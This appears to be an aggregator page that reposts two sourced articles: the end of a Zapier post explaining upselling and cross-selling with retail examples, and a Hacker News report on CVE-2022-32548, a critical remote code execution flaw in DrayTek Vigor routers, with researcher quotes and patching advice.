As you’re contemplating how much you need, you’ll also notice that the prices don’t increase proportionately with the increase in services. The Pro plan costs twice as much as the Plus plan, but offers four times more attachment space and ten times more automation runs. When the higher overall price means a lower price-per-item, people are much more susceptible to being upsold.

Those are just two examples. Once you know what upselling looks like, you’ll start to notice it everywhere. More examples include:

Promoting a warranty when someone buys an appliance
Suggesting upgrading to a spa package when someone goes to book a massage
Offering more analytical accounting services in addition to your standard transitional bookkeeping services
When someone hires you to design their logo, proposing an entire branding package instead
Suggesting the fleece-lined version when someone’s about to buy leggings

What is cross-selling?

Cross-selling is about getting customers to buy different, related items in addition to what they’re already buying. The most effective cross-sellers pitch items that will enhance whatever the person is buying, or will make using that item much easier.

The most clear-cut example is Amazon. Whenever you’re looking at a product, if you scroll down, you’ll always see a “Customers also bought” section. Amazon also uses automated purchase history analysis to look at what you’ve bought in the past, find customers with similar buying habits, and suggest items that are popular among people who are looking for the same things you are.

Have a look at this small business in the candle game:

Four candles with prices under the heading "You may also like"

In this case, when you buy a relaxing candle, the site is going to recognize more types of relaxing candles. But cross-selling isn’t just about getting customers to buy more similar items right this moment—it’s also about exposing your customers to new products they might not be familiar with.

The most important thing to keep in mind is that while products you suggest don’t need to be extremely similar, they do need to be complementary. Cross-selling isn’t just about getting customers to buy more items right this moment—it’s about exposing your customers to new products and offerings they may not have seen before. When coupled with a purchase your customer is already set on buying, your brand exposure can have more significant weight than you might expect. You may not make the extra sale today, but you increase the likelihood that the customer comes back at some point down the line.

Upselling vs. cross-selling in action

One of the easiest ways to learn the difference between upselling and cross-selling is to look for examples of both within the same industry or even at the same company.

Let’s say you buy a new desk chair for your home office. The upsell would be a better, fancier chair with ergonomic features and fancy wheels. The cross-sell would be an under-desk mat, which you’ll need to keep those fancy wheels from tearing up the hardwood.

Applying upselling and cross-selling to your business

Upselling and cross-selling are both an art and a science. You need to think creatively about your offerings (and potential offerings) and how they might complement existing purchases. But you also need to dive into your analytics and make some data-driven decisions about what your customers are buying, when they’re buying them, and why. After all, upselling and cross-selling won’t do anything for you if no one actually buys what you’re promoting.

I’ve found that the most effective strategy when it comes to using upselling and cross-selling well is to reverse engineer what makes the most sense for your customers. What adds the most value for them? What questions do they have when buying from you? What products or services do they ask you about that you don’t yet offer? Talking directly to existing customers or clients about what they might want is a great place to start.

And remember: there’s always room to experiment. If people who buy product X often also buy product Y, you should absolutely be trying to sell product Y to everyone who buys product X. But don’t stop there. Try promoting product Z to those same people, or try upselling them to a higher quality version. Think outside the box, and you’ll find some creative ways to sell more—and better.

This article was originally published in March 2021 and was most recently updated in August 2022 with contributions from Amanda Pell.

Source :
https://zapier.com/blog/cross-selling-vs-upselling/

Critical RCE Bug Could Let Hackers Remotely Take Over DrayTek Vigor Routers

As many as 29 different router models from DrayTek have been identified as affected by a new critical, unauthenticated remote code execution vulnerability that, if successfully exploited, could lead to full compromise of the devices and unauthorized access to the broader network.

“The attack can be performed without user interaction if the management interface of the device has been configured to be internet facing,” Trellix researcher Philippe Laulheret said. “A one-click attack can also be performed from within the LAN in the default device configuration.”

Filed under CVE-2022-32548, the vulnerability has received the maximum severity rating of 10.0 on the CVSS scoring system, owing to its ability to completely allow an adversary to seize control of the routers.

At its core, the shortcoming is the result of a buffer overflow flaw in the web management interface (“/cgi-bin/wlogin.cgi”), which can be weaponized by a malicious actor by supplying specially crafted input.

“The consequence of this attack is a takeover of the so-called ‘DrayOS’ that implements the router functionalities,” Laulheret said. “On devices that have an underlying Linux operating system (such as the Vigor 3910) it is then possible to pivot to the underlying operating system and establish a reliable foothold on the device and local network.”

Over 200,000 devices from the Taiwanese manufacturer are said to have the vulnerable service currently exposed on the internet and would require no user interaction to be exploited. Many of the remaining 500,000 devices, even when not exposed externally, are susceptible to one-click attacks.

The breach of a network appliance such as Vigor 3910 could not only leave a network open to malicious actions such as credential and intellectual property theft, botnet activity, or a ransomware attack, but also cause a denial-of-service (DoS) condition.

The disclosure comes a little over a month after it emerged that routers from ASUS, Cisco, DrayTek, and NETGEAR are under assault from a new malware called ZuoRAT targeting North American and European networks.

While there are no signs of exploitation of the vulnerability in the wild so far, it’s recommended to apply the firmware patches as soon as possible to secure against potential threats.

“Edge devices, such as the Vigor 3910 router, live on the boundary between internal and external networks,” Laulheret noted. “As such they are a prime target for cybercriminals and threat actors alike. Remotely breaching edge devices can lead to a full compromise of the businesses’ internal network.”

Source :
https://thehackernews.com/2022/08/critical-rce-bug-could-let-hackers.html